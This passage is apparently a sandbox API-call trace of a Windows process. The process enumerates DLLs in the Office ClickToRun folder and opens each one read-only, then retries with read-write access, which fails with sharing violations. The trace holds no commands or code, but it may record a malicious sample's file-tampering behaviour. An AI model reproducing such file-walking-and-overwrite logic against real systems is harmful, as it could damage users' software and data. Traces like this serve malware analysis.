[0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8be28 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0077.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.558] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.558] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af1c6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80af1c6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x8a8d8, dwReserved0=0x329a3fdb, dwReserved1=0xedd32ce, cFileName="AppVIsvVirtualization.dll", cAlternateFileName="AP485B~1.DLL")) returned 1 [0077.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0077.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0077.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0077.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0077.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0077.558] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0077.558] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x819d0 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0077.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x819d0 | out: hHeap=0x20000) returned 1 [0077.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0077.559] AreFileApisANSI () returned 1 [0077.559] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll", lpUsedDefaultChar=0x0) returned 84 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0077.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.559] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0077.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0077.560] AreFileApisANSI () returned 1 [0077.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0077.560] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x60088 [0077.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 84 [0077.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.560] GetFileType (hFile=0x430) returned 0x1 [0077.560] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0077.560] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0077.560] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0077.560] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0077.561] CloseHandle (hObject=0x430) returned 1 [0077.561] AreFileApisANSI () returned 1 [0077.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0077.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa8) returned 0x5f798 [0077.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71758, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=84 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 84 [0077.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.561] GetLastError () returned 0x20 [0077.561] GetLastError () returned 0x20 [0077.561] SetLastError (dwErrCode=0x20) [0077.561] GetLastError () returned 0x20 [0077.561] SetLastError (dwErrCode=0x20) [0077.561] GetLastError () returned 0x20 [0077.561] SetLastError (dwErrCode=0x20) [0077.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0077.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0077.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0077.561] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0077.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.561] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.561] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80af1c6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80af1c6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x12cad8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVManifest.dll", cAlternateFileName="APPVMA~1.DLL")) returned 1 [0077.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0077.561] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0077.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0077.562] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.562] AreFileApisANSI () returned 1 [0077.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll", lpUsedDefaultChar=0x0) returned 75 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0077.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.562] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0077.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0077.563] AreFileApisANSI () returned 1 [0077.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0077.563] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85300 [0077.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 75 [0077.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.563] GetFileType (hFile=0x430) returned 0x1 [0077.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0077.563] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0077.563] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0077.564] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0077.564] CloseHandle (hObject=0x430) returned 1 [0077.564] AreFileApisANSI () returned 1 [0077.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0077.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85b20 [0077.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 75 [0077.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0077.564] GetLastError () returned 0x20 [0077.564] GetLastError () returned 0x20 [0077.564] SetLastError (dwErrCode=0x20) [0077.564] GetLastError () returned 0x20 [0077.564] SetLastError (dwErrCode=0x20) [0077.564] GetLastError () returned 0x20 [0077.564] SetLastError (dwErrCode=0x20) [0077.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0077.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0077.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0077.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.565] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b17ebf, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b17ebf, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0xe76d8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppVOrchestration.dll", cAlternateFileName="APPVOR~1.DLL")) returned 1 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0077.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0077.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0077.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0077.565] AreFileApisANSI () returned 1 [0077.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll", lpUsedDefaultChar=0x0) returned 80 [0077.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0077.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.566] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0077.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0077.566] AreFileApisANSI () returned 1 [0077.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0077.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0077.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 80 [0077.566] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0077.566] GetFileType (hFile=0x430) returned 0x1 [0077.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0077.566] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, 